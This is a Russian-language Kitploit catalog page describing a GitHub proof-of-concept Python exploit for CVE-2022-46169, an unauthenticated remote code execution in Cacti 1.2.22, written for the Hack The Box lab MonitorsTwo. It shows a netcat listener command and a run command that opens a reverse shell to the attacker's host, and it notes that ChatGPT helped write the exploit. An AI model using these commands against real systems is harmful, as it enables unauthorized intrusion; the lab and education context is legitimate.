Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-46169-Exploit — Эксплойт на Python для CVE-2022-46169, обеспечивающий неаутентифицированное удаленное выполнение кода на Cacti 1.2.22 через обратную оболочку, предназначенный для образовательного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/0xzon/cve-2022-46169-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHub0xzon/cve-2022-46169-exploit

CVE-2022-46169-Exploit

Эксплойт на Python для CVE-2022-46169, обеспечивающий неаутентифицированное удаленное выполнение кода на Cacti 1.2.22 через обратную оболочку, предназначенный для образовательного тестирования на проникновение.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

CVE-2022-46169 PoC - Неаутентифицированное RCE в Cacti 1.2.22

Этот репозиторий содержит эксплойт для CVE-2022-46169, поражающий Cacti 1.2.22. Эта уязвимость позволяет неаутентифицированному злоумышленнику выполнить произвольный код на пораженной системе.

Если вы хотите подробное описание того, как этот эксплойт возможен, обратитесь к этому посту Rapid7. Они вдаются в большие подробности.

Я написал этот код с помощью chatGPT для машины Hack The Box под названием MonitorsTwo в образовательных целях.

Использование

root@kitploit:~
Arguments:
	-u URL of Cacti Application
	-lhost IP address of machine you want the shell on
	-lport Port of the machine you want the shell on

Настройте прослушиватель на вашей локальной машине с помощью netcat nc -lvnp 9001

Запустите эксплойт против цели python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001

Отказ от ответственности

Этот Proof of Concept (PoC) предназначен строго для образовательных и тестовых целей. Применение этого PoC к любой системе или сети без явного разрешения владельца системы является незаконным и может привести к судебному преследованию. Создатель не несет ответственности за любой вред, возникший в результате правильного или неправильного использования этого PoC. Используйте на свой страх и риск.

Ссылки

https://chat.openai.com/

https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/

Скачать инструмент